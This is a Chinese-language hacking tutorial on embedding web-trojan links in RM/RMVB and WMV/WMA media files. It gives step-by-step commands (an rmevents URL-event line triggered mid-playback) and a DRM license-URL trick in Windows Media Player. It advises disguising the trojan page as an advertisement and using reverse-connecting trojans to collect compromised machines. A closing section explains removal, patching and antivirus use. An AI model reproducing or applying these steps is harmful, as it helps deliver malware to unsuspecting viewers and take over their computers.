危害性更大媒體文件木馬攻防實戰

　　如今網絡上流傳最為廣泛的媒體文件有兩類，一類是RM、RMVB文件，另一類是WMV、WMA文件，由於它們對流媒體的良好支持，使網絡上的電影、音樂等媒體文件幾乎都采用了這兩種媒體文件格式，因此，如果在媒體文件中植入木馬，那麼媒體文件中木馬獨有的隱蔽性將會使受害者在不知不覺中被網頁木馬侵害，危害性可見一斑。

　　RM、RMVB中加入木馬

　　Helix Producer Plus是一款圖形化的專業流媒體文件制作工具，我們可以利用Helix Producer Plus這款軟件把其他格式的文件轉換成RM或RMVB格式，當然也可以對已存在的RM文件進行重新編輯，在編輯的同時，我們可以把事先准備好的網頁木馬插入其中。這樣只要一打開這個編輯好的媒體文件，插入在其中的網頁木馬也會隨之打開，我們甚至還能控制網頁木馬打開的時間，讓網頁木馬更隱蔽。

　　步驟1:首先下載Helix Producer Plus，一路“Next”完成安裝，然後我們要找一個能把網頁木馬插入其中的RM電影文件，把它改名為film.rm，然後拷貝到Helix Producer Plus安裝目錄的RealMediaEditor文件夾下。

　　步驟2:我們在這個文件夾中新建一個文本文檔，命名為test.txt，在test.txt文件中寫入這樣一句命令:“u 00:07:00 00:07:30 http://www.***.com/in

　　dex.php”，這句命令的意思是當媒體文件播放到第7分鐘後觸發打開URL事件，然後到7分30秒的時候事件結束，最後面的就是URL的網址，我們可以把這個網址改成我們的網頁木馬的地址(關於網頁木馬的制作和設置已經多次介紹，在此不再重復)，這樣便可以在別人看媒體文件的時候打開網頁木馬，讓他不知不覺中招(如圖1)。

　　小提示:對於制作的網頁木馬應盡量隱蔽，並模仿正常網頁，否則在看媒體文件時突然彈出網頁誰都會有疑心，當然把它做成類似的廣告網頁效果最好，別人會以為是廣告，便一關了之，而這時我們已經種馬成功了。對於木馬的選擇應盡量使用具有反向連接的木馬，如灰鴿子，否則即使有了上百的肉雞，一個一個去連接也是很麻煩的。

　　步驟3:運行CMD(命令提示符)，進入RealMediaEditor文件夾，輸入命令:“rmevents -i film.rm -e test.txt -o film2.rm”，這是最關鍵的一步，意思是利用Helix Producer Plus自帶的rmevents.exe把test.txt這個觸發URL事件合並到film.rm中，並另存為film2.rm。這個新生成的film2.rm便是我們需要的帶有網頁木馬的媒體文件(如圖2)。

　　WMV、WMA中加入木馬

　　對於WMA、WMV文件，我們可以利用其默認的播放器Windows Media Player的“Microsoft Windows媒體播放器數字權限管理加載任意網頁漏洞”來插入木馬。當我們播放已經插入木馬的惡意文件時，播放器首先會彈出一個提示窗口，說明此文件經過DRM加密需要通過URL驗證證書，而這個URL就是我們事先設置好的網頁木馬地址，當用戶點擊“是”進行驗證時，我們便種馬成功了。和RM文件種馬一樣，在WMV文件中插入木馬我們還需要一樣工具――WMDRM打包加密器，這是一款可以對WMA、WMV進行DRM加密的文件，軟件本身是為了保護媒體文件的版權，但在攻擊者手中，便成了黑客的幫凶。

　　安裝“WMDRM打包加密器”，完成後運行，軟件界面很簡潔(如圖3)。首先出現的是“自定義打包”標簽，我們點擊“源文件”右邊的浏覽按鈕，選擇一個WMA或WMV文件，然後我們在下面的“輸出目錄”裡選擇生成惡意文件的保存路徑，然後在“輸出文件後綴” 中填入生成的文件後綴，建議和源文件保持一致。完成後我們切換到“認證字符串”標簽， 在“認證URL”欄裡輸入我們的網頁木馬地址，如:http://www.***.com/index.php,其他保持默認即可。再切換到“自定義打包”標簽，點擊“打包加密’按鈕，植有網頁木馬的惡意媒體文件就生成了。

　　當用戶打開這個惡意媒體文件時，Windows Media Player會要求你獲取證書(如圖4)，點擊“確定”後就會彈出我們的網頁木馬。

　　有攻就有防，我們不能坐以待斃，任其宰割，其實惡意媒體文件不是我們想象中的那麼神秘，只要我們掌握好一些清除網頁木馬的小知識,就可以完全阻止網頁木馬運行。

　　RM、RMVB木馬清除方法

　　我們以上文中制作RM木馬的方法為例，新建一個內容為空的文本文件test.txt，然後在CMD中運行“rmevents -i 存在木馬的媒體文件.rm -e test.txt -o film.rm”，這樣便可以利用與插入木馬相同的辦法把觸發URL事件覆蓋掉，這時輸出的film.rm便是不存在木馬的干淨媒體文件了。

　　如果對命令提示符的使用不熟悉，我們使用Helix RealMedia Editor來清除其中的網頁木馬。打開RealMediaEditor文件夾下的rmevents.exe文件，其界面如圖5所示，同樣新建一個內容為空的test.txt，然後在Helix RealMedia Editor的菜單欄中點擊“Tools”，選擇其中的“Merge Events”。接著選擇我們剛才創建的test.txt，點擊“確定”。最後選擇“File”菜單中的“Save RealMedia File”保存媒體文件即可，其原理和利用rmevents.exe清除網頁木馬的原理是一樣的。

　　WMA、WMV木馬清除方法

　　由於這是利用了Windows Media Player的漏洞，因此我們不能清除媒體文件中的惡意DRM加密信息，我們唯一可以做的就是打好補丁，惡意WMA、WMV文件對打過補丁的Windows Media Player將不起作用。補丁下載地址:http://www.microsoft.com/technethttp://security.chinaitlab.com/

　　此外，我們還可以選擇其他的播放器來播放媒體文件，如暴風影音、Mplayer等，一些在媒體文件中插入網頁木馬事件的功能在它們面前將不起作用，因此這樣也可以在一定程度上防范媒體網頁木馬。

　　安全在很大程度上取決於用戶的安全意識，只有提高安全意識才能減少中招的概率，比如不打開陌生的媒體文件，不隨意進入陌生的網站等，當然光有安全意識還不夠，我們還需要殺毒軟件等好幫手，畢竟任何網頁木馬都需要先下載到本地才能運行，而殺毒軟件可以防止木馬的運行，因此我們必須及時升級殺毒軟件的病毒庫。只有防先於攻，才能算得上是真正的安全。